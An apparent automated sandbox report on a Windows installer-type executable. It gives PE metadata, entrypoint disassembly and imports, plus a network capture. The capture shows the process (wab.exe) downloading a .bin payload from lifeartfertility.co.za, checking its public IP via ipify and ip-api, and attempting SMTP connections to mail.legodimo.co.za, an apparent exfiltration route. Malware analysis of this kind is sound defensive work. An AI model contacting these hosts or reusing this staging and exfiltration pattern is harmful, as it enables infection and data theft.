Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x52BA669C [Wed Dec 25 05:01:16 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e160ef8e55bb9d162da4e266afd9eef3

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409190h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407034h]
push 00008001h
call dword ptr [0040711Ch]
push ebx
call dword ptr [0040728Ch]
push 00000008h
mov dword ptr [007A1FB8h], eax
call 00007F29E4D1DDBAh
mov dword ptr [007A1F04h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0079D4B8h
call dword ptr [00407164h]
push 00409180h
push 007A1700h
call 00007F29E4D1DA64h
call dword ptr [00407120h]
mov ebp, 007A7000h
push eax
push ebp
call 00007F29E4D1DA52h
push ebx
call dword ptr [00407118h]
cmp byte ptr [007A7000h], 00000022h
mov dword ptr [007A1F00h], eax
mov eax, ebp
jne 00007F29E4D1B02Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 007A7001h
push dword ptr [esp+14h]
push eax
call 00007F29E4D1D4E2h
push eax
call dword ptr [00407220h]
mov dword ptr [esp+1Ch], eax
jmp 00007F29E4D1B0E5h
cmp cl, 00000020h
jne 00007F29E4D1B028h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F29E4D1B01Ch

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3d1000	0x28460	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5bc6	0x5c00	1c2121f50aaec3e631d6b7fee7746690	False	0.682022758152174	data	6.511374859754948	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x11ce	0x1200	640f709ec19b4ed0455a4c64e5934d5e	False	0.4520399305555556	OpenPGP Secret Key	5.23558258677739	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x398ff8	0x400	b0f803610c3eabc488111ca7ad209e8f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a2000	0x2f000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3d1000	0x28460	0x28600	e3bcc83e0ea219acebebf71bfbb5b1b1	False	0.1932626257739938	data	4.371839987828179	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3d1358	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	United States	0.16202827398556727
RT_ICON	0x3e1b80	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864	English	United States	0.1903773386588186
RT_ICON	0x3eb028	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736	English	United States	0.21769870609981515
RT_ICON	0x3f04b0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	United States	0.21817430325932924
RT_ICON	0x3f46d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States	0.26649377593360996
RT_ICON	0x3f6c80	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States	0.3374765478424015
RT_ICON	0x3f7d28	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	English	United States	0.39549180327868855
RT_ICON	0x3f86b0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	United States	0.499113475177305
RT_DIALOG	0x3f8b18	0x100	data	English	United States	0.5234375
RT_DIALOG	0x3f8c18	0x11c	data	English	United States	0.6091549295774648
RT_DIALOG	0x3f8d38	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x3f8e00	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3f8e60	0x76	data	English	United States	0.7457627118644068
RT_VERSION	0x3f8ed8	0x27c	data	English	United States	0.5110062893081762
RT_MANIFEST	0x3f9158	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
KERNEL32.dll	GetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, Sleep, CloseHandle, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, SetErrorMode, GetCommandLineA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
USER32.dll	CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 5, 2024 14:29:30.607944965 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:30.607971907 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:30.608048916 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:30.618583918 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:30.618597031 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:31.409698009 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:31.409822941 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:31.462735891 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:31.462773085 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:31.463257074 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:31.463326931 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:31.467201948 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:31.512238979 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.185168028 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.185208082 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.185363054 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.185363054 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.185384989 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.185431004 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.574750900 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.574769020 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.574882984 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.575306892 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.575370073 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.576209068 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.576277971 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.662112951 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.662194967 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.967374086 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.967390060 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.967454910 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.967787981 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.967847109 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.968365908 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.968430996 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.968723059 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.968782902 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.969110012 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.969165087 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.007661104 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.007775068 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.052598953 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.052675962 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.357769966 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.357814074 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.357899904 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.358783007 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.358854055 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.359581947 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.359658957 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.360053062 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.360112906 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.360893011 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.360955954 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.363617897 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.363698959 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.364008904 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.364067078 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.364495993 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.364557028 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.364875078 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.364933014 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.365427017 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.365494013 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.365847111 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.365906000 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.397474051 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.397674084 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.442064047 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.442148924 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.442998886 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.443084955 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.746762991 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.746778011 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.746896029 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.747373104 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.747486115 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.748425961 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.748524904 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.749711990 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.749813080 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.750442028 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.750509977 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.750530005 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.750593901 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.750843048 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.750859022 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:34.727952957 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 5, 2024 14:29:34.727988958 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 5, 2024 14:29:34.728061914 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 5, 2024 14:29:34.729635000 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 5, 2024 14:29:34.729650021 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 5, 2024 14:29:34.993541002 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 5, 2024 14:29:34.993613958 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 5, 2024 14:29:34.995945930 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 5, 2024 14:29:34.995951891 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 5, 2024 14:29:34.996200085 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 5, 2024 14:29:34.999180079 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 5, 2024 14:29:35.040240049 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 5, 2024 14:29:35.336438894 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 5, 2024 14:29:35.336507082 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 5, 2024 14:29:35.336554050 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 5, 2024 14:29:35.339381933 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 5, 2024 14:29:35.468311071 CEST	49738	80	192.168.2.4	208.95.112.1
Apr 5, 2024 14:29:35.617567062 CEST	80	49738	208.95.112.1	192.168.2.4
Apr 5, 2024 14:29:35.618913889 CEST	49738	80	192.168.2.4	208.95.112.1
Apr 5, 2024 14:29:35.618954897 CEST	49738	80	192.168.2.4	208.95.112.1
Apr 5, 2024 14:29:35.769764900 CEST	80	49738	208.95.112.1	192.168.2.4
Apr 5, 2024 14:29:35.823178053 CEST	49738	80	192.168.2.4	208.95.112.1
Apr 5, 2024 14:29:37.071132898 CEST	49738	80	192.168.2.4	208.95.112.1
Apr 5, 2024 14:29:37.220423937 CEST	80	49738	208.95.112.1	192.168.2.4
Apr 5, 2024 14:29:37.220551014 CEST	49738	80	192.168.2.4	208.95.112.1
Apr 5, 2024 14:29:38.245733976 CEST	49739	587	192.168.2.4	41.76.215.87
Apr 5, 2024 14:29:39.245085955 CEST	49739	587	192.168.2.4	41.76.215.87
Apr 5, 2024 14:29:41.245115995 CEST	49739	587	192.168.2.4	41.76.215.87
Apr 5, 2024 14:29:45.245493889 CEST	49739	587	192.168.2.4	41.76.215.87
Apr 5, 2024 14:29:53.260687113 CEST	49739	587	192.168.2.4	41.76.215.87
Apr 5, 2024 14:29:59.311420918 CEST	49741	587	192.168.2.4	41.76.215.87
Apr 5, 2024 14:30:00.323172092 CEST	49741	587	192.168.2.4	41.76.215.87
Apr 5, 2024 14:30:02.323193073 CEST	49741	587	192.168.2.4	41.76.215.87
Apr 5, 2024 14:30:06.323591948 CEST	49741	587	192.168.2.4	41.76.215.87
Apr 5, 2024 14:30:14.323287964 CEST	49741	587	192.168.2.4	41.76.215.87

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 5, 2024 14:29:27.937371016 CEST	63131	53	192.168.2.4	1.1.1.1
Apr 5, 2024 14:29:28.932619095 CEST	63131	53	192.168.2.4	1.1.1.1
Apr 5, 2024 14:29:29.666644096 CEST	53	63131	1.1.1.1	192.168.2.4
Apr 5, 2024 14:29:29.666661978 CEST	53	63131	1.1.1.1	192.168.2.4
Apr 5, 2024 14:29:34.599587917 CEST	56490	53	192.168.2.4	1.1.1.1
Apr 5, 2024 14:29:34.724447966 CEST	53	56490	1.1.1.1	192.168.2.4
Apr 5, 2024 14:29:35.342222929 CEST	64400	53	192.168.2.4	1.1.1.1
Apr 5, 2024 14:29:35.466835022 CEST	53	64400	1.1.1.1	192.168.2.4
Apr 5, 2024 14:29:37.071944952 CEST	50033	53	192.168.2.4	1.1.1.1
Apr 5, 2024 14:29:38.057656050 CEST	50033	53	192.168.2.4	1.1.1.1
Apr 5, 2024 14:29:38.244194984 CEST	53	50033	1.1.1.1	192.168.2.4
Apr 5, 2024 14:29:38.244252920 CEST	53	50033	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 5, 2024 14:29:27.937371016 CEST	192.168.2.4	1.1.1.1	0x949	Standard query (0)	lifeartfertility.co.za	A (IP address)	IN (0x0001)	false
Apr 5, 2024 14:29:28.932619095 CEST	192.168.2.4	1.1.1.1	0x949	Standard query (0)	lifeartfertility.co.za	A (IP address)	IN (0x0001)	false
Apr 5, 2024 14:29:34.599587917 CEST	192.168.2.4	1.1.1.1	0xd232	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Apr 5, 2024 14:29:35.342222929 CEST	192.168.2.4	1.1.1.1	0xc1b2	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Apr 5, 2024 14:29:37.071944952 CEST	192.168.2.4	1.1.1.1	0x4422	Standard query (0)	mail.legodimo.co.za	A (IP address)	IN (0x0001)	false
Apr 5, 2024 14:29:38.057656050 CEST	192.168.2.4	1.1.1.1	0x4422	Standard query (0)	mail.legodimo.co.za	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 5, 2024 14:29:29.666644096 CEST	1.1.1.1	192.168.2.4	0x949	No error (0)	lifeartfertility.co.za		102.67.137.82	A (IP address)	IN (0x0001)	false
Apr 5, 2024 14:29:29.666661978 CEST	1.1.1.1	192.168.2.4	0x949	No error (0)	lifeartfertility.co.za		102.67.137.82	A (IP address)	IN (0x0001)	false
Apr 5, 2024 14:29:34.724447966 CEST	1.1.1.1	192.168.2.4	0xd232	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Apr 5, 2024 14:29:34.724447966 CEST	1.1.1.1	192.168.2.4	0xd232	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Apr 5, 2024 14:29:34.724447966 CEST	1.1.1.1	192.168.2.4	0xd232	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Apr 5, 2024 14:29:35.466835022 CEST	1.1.1.1	192.168.2.4	0xc1b2	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Apr 5, 2024 14:29:38.244194984 CEST	1.1.1.1	192.168.2.4	0x4422	No error (0)	mail.legodimo.co.za	legodimo.co.za		CNAME (Canonical name)	IN (0x0001)	false
Apr 5, 2024 14:29:38.244194984 CEST	1.1.1.1	192.168.2.4	0x4422	No error (0)	legodimo.co.za		41.76.215.87	A (IP address)	IN (0x0001)	false
Apr 5, 2024 14:29:38.244252920 CEST	1.1.1.1	192.168.2.4	0x4422	No error (0)	mail.legodimo.co.za	legodimo.co.za		CNAME (Canonical name)	IN (0x0001)	false
Apr 5, 2024 14:29:38.244252920 CEST	1.1.1.1	192.168.2.4	0x4422	No error (0)	legodimo.co.za		41.76.215.87	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

lifeartfertility.co.za

api.ipify.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	208.95.112.1	80	7456	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
Apr 5, 2024 14:29:35.618954897 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Apr 5, 2024 14:29:35.769764900 CEST	175	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 12:29:35 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	102.67.137.82	443	7456	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-05 12:29:31 UTC	184	OUT	GET /dKatzZJXqh143.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: lifeartfertility.co.za Cache-Control: no-cache
2024-04-05 12:29:32 UTC	223	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 12:29:31 GMT Server: Apache Last-Modified: Thu, 28 Mar 2024 07:35:17 GMT Accept-Ranges: bytes Content-Length: 246336 Connection: close Content-Type: application/octet-stream
2024-04-05 12:29:32 UTC	7969	IN	Data Raw: c8 9f ed 47 31 da 8a 5c 46 67 65 dc d9 01 bf 62 9c a2 d2 fd c2 96 9c ef 49 d6 7f 86 91 aa fe b2 53 0c 98 e8 12 28 e8 76 03 45 a9 5e 14 a8 6f 40 72 bb 3b cb 29 7f 79 d3 2c 2d 05 82 48 e8 f9 33 a3 13 d7 7c 2d c1 d3 cb 85 92 30 96 41 b2 f8 c8 70 90 44 f1 57 80 df 24 5c ff 9a 0e 20 70 eb ec d0 bb d1 9b a5 23 99 59 cf 1f 35 e9 6d e9 33 4b 01 e6 6e e8 b8 a1 4d b1 6e f5 d6 b4 1e fa 2c ce 84 cc 4e 32 9f 02 6a 1c a5 c2 5f d6 37 22 aa f7 1b ac 97 ee 05 a0 06 e5 d0 a9 3e 0f 77 c5 cb 2b 18 db 82 51 67 1b 1a 1a df df 2a 79 32 32 ac 8a f8 2b 82 6c d0 3a c0 f0 a0 f2 19 da c2 54 03 18 e5 f1 4b 41 18 6b ea 01 95 b4 b2 9e 73 0e 3b 50 c7 9d 97 e5 63 fd 3b f4 56 3a c7 73 8d c6 a5 04 87 03 55 4d 7c 54 15 44 e4 cd 1f cc 81 f6 04 6c 6e 3d 99 9b d8 c3 01 8d 3a 0b 3c 90 f7 87 d6 Data Ascii: G1\FgebIS(vE^o@r;)y,-H3\|-0ApDW$\ p#Y5m3KnMn,N2j_7">w+Qg*y22+l:TKAks;Pc;V:sUM\|TDln=:<
2024-04-05 12:29:32 UTC	8000	IN	Data Raw: dc ab 1b 84 15 dc f5 8f 52 84 59 6a 66 7b e3 f6 03 a3 41 a6 97 1f a7 65 a4 f6 99 48 cc 66 cb 7d fb 73 bd 29 dc 0a 7c 43 ba 8f c2 06 b9 0f 1b 9a 6e 75 7d 00 b8 dd 4b 36 49 d3 46 d8 0f 57 78 a4 32 e7 9d 1f cd 6f 20 a8 f2 9d 79 01 20 54 13 4f 47 1b d4 5b a2 b7 e9 86 c8 b6 87 80 f4 34 7c 40 2a eb 85 62 76 0f b1 7b 41 79 a7 0e 23 97 0d 3b e3 99 ce da c1 5a 85 90 1c 13 be c6 96 bf 34 6b df 9b f3 2e d2 0e f7 a6 20 35 63 71 c0 a2 4a 14 cd 7d 00 bb 0c a3 f2 ca 79 8b b2 e0 db ff 1c 6c b4 f5 74 9d 05 b3 1e 35 46 f6 bc 42 c4 a2 a0 8b b5 40 e9 e8 42 4f e3 f2 dd c0 3f 38 97 5e 35 ac 62 a3 d1 3d 11 23 b3 2b ad f8 99 35 a9 02 80 2c 40 ba 1b c0 ad 9b 9a 17 fa 6e 3c ee 51 97 c2 bb c9 4e 72 ae c8 c0 11 36 09 29 54 5f 6f 11 42 ab cd 9c 6f 35 9d 42 d3 64 af c8 ab 5f fb 16 cc Data Ascii: RYjf{AeHf}s)\|Cnu}K6IFWx2o y TOG[4\|@*bv{Ay#;Z4k. 5cqJ}ylt5FB@BO?8^5b=#+5,@n<QNr6)T_oBo5Bd_
